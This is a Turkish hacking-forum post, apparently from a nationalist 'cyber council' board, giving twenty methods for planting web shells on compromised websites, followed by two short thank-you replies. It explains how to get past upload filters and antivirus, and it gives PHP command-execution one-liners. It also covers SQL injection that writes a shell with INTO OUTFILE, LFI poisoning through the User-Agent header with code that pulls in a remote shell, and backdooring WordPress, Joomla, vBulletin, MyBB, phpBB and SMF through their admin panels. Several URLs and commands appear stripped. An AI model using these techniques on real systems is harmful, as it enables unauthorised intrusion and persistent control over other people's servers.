Neler yeni

Soru sor

Topluluğumuzdan Sorular Sorun ve Cevaplar Alın

Cevap

Soruları Cevaplayın ve Konunuzda Uzman Olun

İletişim Personeli

Uzmanlarımız Sorularınızı Cevaplamaya Hazır

  • Vatan Diye Bir Hastalığa Tutulduk. Allah Şifa Mifa Vermesin. O Şimdi Asker UNİNVİTED
  • Türk Siber Konseyi Siber Savaşcı Katılım Formu (Grup Alımı İçin Tıkla)
  • Vatan Ugruna Can Alip Can Verenlerin Serefine / In h those who gave their lives to the Turkey

Siteye Shell Atmanın 20 Yolu

Team Star

Mareşal
Yönetici
Mareşal
Katılım
1 Ara 2020
Mesajlar
245
Tepkime puanı
88
Puanları
28

Reputation:

Birçok kişi bir siteye erişim elde ettikten sonra Shell atmaya calisir. Ancak birkaç yöntem denemesine rağmen başaramaz ve pes eder. Bu konuda sizlere 20 temel Shell atma yöntemini anlatacagim ;


1. Yontem

Bazi eski sitelerde sadece script tabanli dosya uzanti kontrolu yapilir. Bu kontrolu asmak icin scriptin sonuna .gif, .jpg, .doc, .htmlgibi uzantilar eklenerek bu sinirlama asilabilir. Ornegin; atmak istediginiz shell adi solver.php ise dosya adini solver.php.jpg seklinde degistirerek bu yontemi deneyebilirsiniz.

2. Yontem

Eger WAF veya antivirus shell atmanizi engelliyorsa, oncelikle basit birkac satirdan olusan bir uploader script yuklemeyi deneyin. Uploader’i yukledikten sonra shellinizi atmayi deneyin.

3. Yontem
Bazi guvenlik duvarlari yuklenecek dosyanin basligini kontrol ederek izin verilip verilmeyecegine bakabilir. Boyle bir guvenligi bypass etmek icin yuklemek istediginiz shell’i notepad ile acin ve en ust satira GIF89a; yazin. Bu sekilde server’i dosyanin bir gif resmi olduguna inandirabilirsiniz. Bu yontemi 1 numarali yontemle birlestirirseniz sansiniz daha da artar.

4. Yontem

Bazi sitelerde sunucu tabanli yerine istemci tabanli guvenlik onlemleri bulunur. Boyle bir durumda Firefox’un Firebug eklentisini indirin ve upload formunu yeniden duzenleyin.

Bu formdaki accept=”*.jpg” filtresini accept=”*.*” seklinde degistirin. Bu sekilde uzanti kontrolunu asabilirsiniz.

5. Yontem
Firefox’u acin ve LIVE HTTP HEADERS eklentisini indirin. Shell’inizin adini solver.php.jpg (ya da hangi uzantiyi kabul ediyorsa) seklinde degistirin. Daha sonra Firefox’u ve Live HTTP Headers eklentisini acin, shellinizi upload edin.

solver.php.jpg yazisina tiklayin ve asagidaki “Reply” butonuna basin. Daha sonra yeni bir pencere acilacak:
Dosya adinin sonundaki .jpg uzantisini silin. Reply tusuna basarak HTTP POST istegini gonderin. Shell’iniz solver.php adiyla yuklenecektir

6.Yontem

edjpgcom.exe programini indirin.Bu program Windows uzerinde calisir ve JPG, JPEG dosyalarina JPEG Comment eklemeye yarar. Programin kullanimi su sekildedir:

Programi masaustunde bir klasore kopyalayin. Daha sonra ayni klasore istediginiz bir JPG resim dosyasini kopyalayin. Resim dosyasini surukleyip programin ustune birakin. Programin acildigini ve bos bir kutu oldugunu goreceksiniz. Bu bos kutu icerisine shell kodlarinizi yazin. Ancak burada dikkat etmeniz gereken sey sudur: Butun bir shell’i oraya sigdiramazsiniz. O yuzden ufak cmd kodunu deneyin ;

“; system($_GET[’cmd’]); echo ?>

7. Yontem

Server’i kandirmanin bir baska yolu da icerik tipi degistirmekten gecer. Firefox’un Tamper Data eklentisini indirin ve kurun. Daha sonra eklentiyi acip Start Tamper butonuna basin. Shell’inizi upload edin. Tamper data eklentisi hemen bir uyari verecektir. Bu uyarida “Tamper” butonuna tiklayin.

Cikan penceredeki post_data’yi oldugu gibi kopyalayin ve not defterine yapistirin. Icerisindeki butun application/octet-streamyazilarini bulup bunlari image/gif ya da image/jpg seklinde degistirin. Daha sonra degismis haliyle oldugu gibi eskisiniz.
yerine yapistirarak submit butonuna tiklayin. Bu sekilde serveri, dosyanizin resim dosyasi olduguna inandirabilir
8. Yontem

Yukaridaki butun bu yontemler sitede bir upload butonu buldugunuzda calisabilir. Ancak bazen hicbir upload formu bulamazsiniz. Bu durumda da admin panelinde direk olarak dosyalari duzenleyen yerleri arayin. Ornegin panelde 404 sayfasini duzenleyen bir bolum
buldunuz. Hemen dosyae icrisine php, asp kodlari yazarak dosyanin iceriginin degisip degismedigini kontrol edin. Eger degisiyorsa bu sekilde shell kodlarinizi yazip kaydedebilirsiniz.

9. Yontem

Bazi sitelerde de RFI yani uzaktan dosya calistirma acigi bulunmaktadir. Bu acigi bulursaniz, farkli bir siteye shell’inizi txt formatinda yukleyin. Daha sonra da uzaktan bu shell’i acik bulunan sitede cagirarak siteye shell atabilirsiniz. Ornegin:



10. Yontem

Bazen server uzerinde guclu antivirusler ve guvenlik duvarlari bulunur. Siz shell’inizi upload etseniz bile bunlar yakalar ve hemen silerler. Bu gibi durumlarda yapmaniz gereken Undetected bir shell bulmaktir.

eval(gzinflate(base64_decode(, ya da preg_replace(”/.*/e”,”\\\\\\\\x65\\\\\\\\x76\\\\\\\\x61\\\\\\\\x6C\\ \\\\\\x28\\\\\\\\x67\\\\\\\\x7A\\\\\\\\x69\\\\\\\\ x6E\\\\\\\\x66\\\\\\\\x6C\\\\\\\\x61\\\\\\\\x74\\\ \\\\\x65\\\\\\\\x28\\\\\\\\x62\\\\\\\\x61\\\\\\\\x 73\\\\\\\\x65\\\\\\\\x36\\\\\\\\x34\\\\\\\\x5F\\\\ \\\\x64\\\\\\\\x65\\\\\\\\x63\\\\\\\\x6F\\\\\\\\x6 4\\\\\\\\x65\\\\\\\\x28’

seklinde baslayan sifrelenmis bir shell bulursaniz bu sorunu cozebilirsiniz. Ancak dikkat etmeniz gereken sey, bu sekilde sifrelenmis shelllerin icerisinde genellikle logger bulunur. Kullanmadan once bunlari temizlemeniz gerekir.

11. Yontem

Diyelimki sitede bir SQL Injection acigi buldunuz. Bu acigi kullanarak shell atmaniz mumkundur. bunun icin su sekilde calisin:

adresinde sql injection olsun.

+order+by+6– diyerek kolon sayimizi buluyoruz.

+union+all+select+1,2,3,4,5,6– yazarak hangi kolondan komut yurutecegimize bakalim.

+union+all+select+1,2,current_user,4,5,6– diyerek mevcut kullanici adini ogreniyoruz. Diyelimki SOLVER olsun.

+union+all+select+1,2,file_priv,4,5,6+FROM+mysql.u ser WHERE+user=’SOLVER’– komutuyla kullanicinin gerekli izinleri varmi diye kontrol ediyoruz.
Cikan sonucta Y yazarsa yetki vardir. Yoksa bu yontemi denemeyin. Biz var oldugunu dusunelim.
Simdi sitenin server uzerindeki yolunu ogrenin. Bunu yapmanin bircok yolu var. En basitinden SQL Injection yaparken bir hata alirsaniz oradan bulabilirsiniz. Ornegin “/home/örnetsite.com/public_html” bizim yolumuz olsun.

Daha sonra site uzerinde yazma yetkisi olan bir dizin bulmamiz gerekli. Genellikle image dizinlerinin yazma yetkisi vardir.

Artik shell yazma komutumuza gecebiliriz:
+union+all+select+1,2,<?system($_REQUEST[’cmd’]);?>,4,5,6+into+outfile+’/home/mahmutesat.com/public_html/images/solver.php’–

Shell dosyamiza seklinde erisebiliriz.

Site uzerinde komut calistirmak için ya da -a gibi linux komutlari deneyebiliriz.

Daha kapsamli bir shell atmak icin ise komutu ile hedef siteye shell cagirabilirip kaydedebilirsiniz.

Daha sonra bu kaydettigimiz txt formatindaki shell’i c99.txt c99.php komutuyla php formatina donusturup erisebilirsiniz.

12. Yontem

Eger sitenin phpMyAdmin paneline erisebilirseniz ve mevcut kullanicinin yazma yetkisi varsa buradan da shell atabilirsiniz.
Ayni bir onceki gibi sitenin serverdaki yolunu buluyoruz.

Cikan bos yere asagidaki komutu giriyoruz:

SELECT “<?system($_REQUEST[’cmd’]);?>” INTO OUTFILE “/home/örneksite.com/public_html/images/solver.php”

Daha sonra da “Git” butonuna tiklayarak SQL kodunu calistiriyoruz. Artik cmd shell’imizi siteye yazdirdik:


Bir onceki yontem gibi uzaktan txt shell cagirip daha sonra adini degistirerek tam erisim sahibi olabilirsiniz.

13. Yontem

Bazi sitelerin FTP girisleri oldukca guvensizdir. Sifreleri kolayca tahmin edilebilir ya da bazen anonymous girisleri acik olur. Bu gibi durumlarda siteye direk FTP ile baglanilarak shell upload edilebilir.

14. Yontem

LFI (Local File Inclusion) acigi ile bir serverdaki yerel dosyalari okumaniz mumkundur. Ornegin; gibi bir komut ile serverin passwd dosyasi okunabilir. Boyle bir durum yakaladigimizda asagidaki yolu izleyerek shell atilabilir:
komutu ile bu dosyanin erisime acik olup olmadigina bakin.

Uzunca bir sayfa kod ile karsilasirsaniz erisim aciktir. Daha sonra Firefox Live HTTP Header eklentisini açarak sayfasini tekrar cagirin. Reply butonuna tiklayin ve cikan pencerede
User Agent kismini su sekilde duzenleyin:

User-Agent: <?php $file = fopen(”c99.php”,”w+”); $stream = fopen (” , “r”); while(!feof($stream)) { &nbsp;$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

Reply tusuna basarak istegi gonderin. Eger istek basarili bir sekilde iletilirse shell’iniz seklinde sitenin ana dizinine upload edilecektir.
LFI konusunda bir diger yontem de log dosyalarini kullanarak shell atmaktir. Yontem hemen hemen ayni sekilde isler:
LFI kullanarak serverin log dosyasina erismeye calisiyoruz:
Dosyaya erisim yetkisi oldugunu onayladiktan sonra siteye bir hata verdirmemiz gerekiyor.

Daha sonra tekrar log dosyasina baktigimizda phpinfo sayfasini gorecegiz:

Bu sekilde shell kodlarini da calistirabilirsiniz. O yuzden tekrar uzun uzun anlatmayacagim.

15. Yontem (Joomla)

Hazir sitelere shell atmanin bircok yolu vardir. Bazen eklentilerden kaynaklanan shell upload aciklari ya da farkli aciklar olabilir. Bunlara girmeyecegim. Eger panele erisiminiz varsa buradan nasil shell atilir onu anlatacagim.

Ilk yontem tema duzenlemedir. Panelde Template Manager’a tiklayin, oradan da herhangi bir temaya tiklayin. Acilan sayfada sag ustteki Edit butonuna tiklayin ve sonra da Edit html’e tiklayin. Cikan bos alana shell kodunu yapistirin. Boylece shellinizi sisteme attiniz. Shell’e erismek için adresi seklinde kullanabilirsiniz.

Ikinci yontem olarak tema eklemeyi deneyebilirsiniz. Joomla surumune uygun bir tema bulup indirin. Tema dosyalarindan birisini acin ve kodlarini shell kodlari ile degistirin. Daha sonra da yeni tema ekle diyerek siteye yukleyin. Bu sekilde sisteme shell atmis olursunuz.

Ucuncu yontem ise Plugin yukleme secenegidir. Ayni tema yukleme gibi plugin dosyalari arasina shell atarak yeni plugin yukleyin ve sistemde shelliniz hazir olur.

16. Yontem (Wordpress)

Admin paneline girdikten sonra Appearance’a gelin ve editor’e tiklayin. Sag taraftan 404.php linkine tiklayin. Acilan kutuda dosya icerigini goreceksiniz. Buraya shell kodlarinizi yapistirin. Shell’inize seklinde erisebilirsiniz.
Ayni Joomla’da oldugu gibi WordPress’te de plugin ve tema yukleyerek de shell atabilirsiniz.

17. Yontem (Vbulletin)

Admin panele girdikten sonra Plugins & Products’a gelin ve Add New Plugin’i secin. Buradan ayarlari asagidaki gibi yapin:

Product: vBulletin Hook
********: global_start
Title: Herhangi birsey
Execution Order: 5
Code: ob_start(); system($_GET[’cmd’]); $execcode = ob_get_contents(); ob_end_clean();
Plugin is Active: Yes

Plugin’i ekledikten sonra “Style and Design” basligina gidin ve “Style Manager”i secin. Buradan Edit Templates’e tiklayin. ForumHome modellerini genisletin ve FORUMHOME secenegine tiklayip duzenleyin. Karsiniza cikacak yerde $header kodunu arayin. Buldugunuz zaman bu kodu $execcode ile degistirin. Simdi siteye donun ve asagidaki komut ile shellinizi olusturun:
shell.txt shell.php

Eger wget calismaz ise asagidakileri de deneyebilirsiniz:

> shell.php
shell.php
Son olarak da shellinize seklinde ulasabilirsiniz.

18. Yontem (SMF)

Admin panele girdikten sonra bu SMF surumu ile uyumlu bir tema indirin. Icerisine shell dosyanizi atin ve tekrar zipleyin. Panelden Themes and Layout’a tiklayip oradan da Install a new theme secenegine gelin. Browse diyerek duzenlediginiz temayi yukleyin. Yuklenen shell’e asagidaki gibi bir adres ile ulasabilirsiniz:
p

19. Yontem (MyBB)

Admin panelden Templates and Styles’a gelin ve varsayilan MyBB temasini bulun. Sonra Templates’e gidin. Varsayilan temayi acin. Calendar templates’i bulun ve tiklayin. buradan “calender”a tiklayin. Butun html kodlarinin en ustune shell kodlarinizi yapistirin ve kaydedin. Yuklenen shell’e asagidaki gibi bir adres ile ulasabilirsiniz:


20. Yontem (phpBB)

Panele girdikten sonra styles > templates > edit yolunu izleyin ve faq_bOdy.html dosyasini secin. Dosyanin en altina asagidaki kodu ekleyin ve kaydedin:

fwrite(fopen($_GET[o], ’w’), file_get_contents($_GET));

Sonra asagidaki komut ile shellimizi sisteme atabiliriz:

Yuklenen shell’e asagidaki gibi bir adres ile ulasabilirsiniz:
 

Laçın041

Üsteğmen
Üsteğmen
Katılım
9 Mar 2021
Mesajlar
124
Tepkime puanı
32
Puanları
28

Reputation:

ellerine sağlık yararlı konu
 

fr3nzy

Asteğmen
Asteğmen
Katılım
23 May 2021
Mesajlar
20
Tepkime puanı
5
Puanları
3

Reputation:

eline sağlık komutanım
 
Üst